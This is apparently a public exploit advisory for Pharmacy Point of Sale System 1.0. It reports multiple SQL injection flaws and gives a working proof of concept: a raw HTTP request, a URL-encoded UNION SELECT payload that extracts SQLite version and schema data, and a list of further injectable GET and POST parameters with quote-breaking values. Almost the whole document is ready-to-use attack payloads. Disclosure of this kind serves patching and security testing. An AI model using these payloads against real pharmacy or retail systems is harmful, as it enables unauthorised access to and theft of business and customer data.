Pharmacy Point of Sale System version 1.0 suffers from multiple remote SQL injection vulnerabilities. Original discovery of SQL injection in this version is attributed to Janik Wehrli in September of 2021.
67cb3f0f5642965281dd9c95b04997cc
# Exploit Title: Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi)
# Date: 28.09.2021
# Exploit Author: Murat
# Vendor Homepage: https://www.sourcecodester.com/php/14957/pharmacy-point-sale-system-using-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/pharmacy.zip
# Version: 1.0
# Tested on: Windows 10
# Pharmacy Point of Sale System v1.0 SQLi
GET /pharmacy/view_product.php?id=-1 HTTP/1.1
Host: localhost
Cookie: PHPSESSID=5smfl8sfgemi1h9kdl2h3dsnd6
Sec-Ch-Ua: "Chromium";v="93", " Not;A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Connection: close
POC:
https://localhost/pharmacy/view_product.php?id=2000110022%27+union+select+1%2c1%2c1%2c1%2c%28select%27SqLi%27%7c%7csubstr%28%28select+sqlite%5fversion%28%29%7c%7c%27%04%27%7c%7c%27sqlite%5fmaster%27%7c%7c%27%04%27%7c%7c%27anonymous%27%7c%7c%27%01%03%03%07%27%29%2c1%2c65536%29%29%2c1%2c1%2c1--
-----------------------------------------------------------------------
#Other parameters with sql injection vulnerability;
==> /pharmacy/?date_from=&date_to=1'"&page=sales_report
==> /pharmacy/?date_from=1'"&date_to=&page=sales_report
==> /pharmacy/manage_stock.php?expiry_date=01/01/1967&id=-1'&product_id=1&quantity=1&supplier_id=1
==> GET /pharmacy/view_receipt.php?id=1'"&view_only=true
==> /pharmacy/manage_product.php?id=-1'
==> POST /pharmacy/Actions.php?a=save_stock
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="id"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="supplier_id"
1'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="product_id"
2'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="quantity"
1'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="expiry_date"
==> POST /pharmacy/Actions.php?a=save_product HTTP/1.1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="id"
5'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="product_code"
94102'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="category_id"
1'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="name"
pHqghUme'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="price"
1'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="description"
1'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="status"
0'"
------------YWJkMTQzNDcw--
-